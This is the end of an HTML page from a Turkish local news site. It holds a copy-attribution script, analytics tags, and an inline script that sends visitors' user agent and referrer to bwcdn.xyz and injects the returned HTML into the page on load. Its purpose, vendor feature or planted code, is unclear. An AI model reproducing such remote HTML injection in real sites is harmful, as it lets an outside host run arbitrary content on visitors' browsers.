	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('71106', 'haber', '');
	
</script>

    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://bwcdn.xyz/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script>	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
